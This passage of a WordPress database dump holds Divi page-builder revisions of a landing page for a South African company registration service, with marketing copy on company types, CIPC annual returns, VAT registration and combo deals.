etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>From (PTY) LTD to<br />Closed Corporations <br />We Do It All</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong><span>All companies are required by law to file annual returns with the CIPC on an annual basis</span>s</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Save Even More<br />You can customize your <br />package for great savings</strong></p>\n[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><b>Each Company Is Unique In Its Own Right</b></p>\n<p><b></b></p>\n<p>Customize your package and save <span style=\"color: #ff00ff;\">BIG</span></p>[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.26.6\" width=\"89%\" max_width=\"1490px\" module_alignment=\"center\" custom_margin=\"|217px||221px||\"][et_pb_column type=\"2_3\" _builder_version=\"3.26.6\"][et_pb_shop type=\"product_category\" posts_number=\"6\" include_categories=\"8,7,17\" columns_number=\"3\" _builder_version=\"3.26.6\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-developer-illustration-small-03-1.png\" _builder_version=\"3.26.6\" width=\"100%\" max_width=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-15 12:58:27','2019-08-15 10:58:27','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32811,3,'2019-08-15 15:00:47','2019-08-15 13:00:47','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>From (PTY) LTD to<br />Closed Corporations <br />We Do It All</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><strong>What type of companies that can be registered</strong><span> </span>in terms of the New Companies Act 71, 2008</p>\n<ul>\n<li>Private company (Pty) Ltd</li>\n<li>Public company (Ltd)</li>\n<li>State-owned company (SOC)</li>\n<li>External company</li>\n<li>Personal liability company (Inc)</li>\n<li>Non-profit company (NPC)</li>\n</ul>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong><span>All companies are required by law to file annual returns with the CIPC on an annual basis</span>s</strong></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p><span>All companies (including external companies) and close corporations are required by law to file their annual returns with the CIPC on an annual basis, within a prescribed time period. The purpose for the filing of such annual returns is to confirm whether a company or close corporation is still in business/trading, or if it will be in business in the near future.</span></p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][et_pb_toggle title=\"View More\" _builder_version=\"3.26.6\" custom_margin=\"-41px||||false|false\"]<p>Any person that carries on a business may register for VAT. The term person is not only limited to companies but also includes, amongst others, individuals, partnerships, trust funds, foreign donor funded projects and municipalities.</p>\n<p>It is<span> </span><span>mandatory</span><span> </span>for a person to register for VAT if sales made from selling goods or services is in excess of R1 million in any consecutive twelve month period.</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" 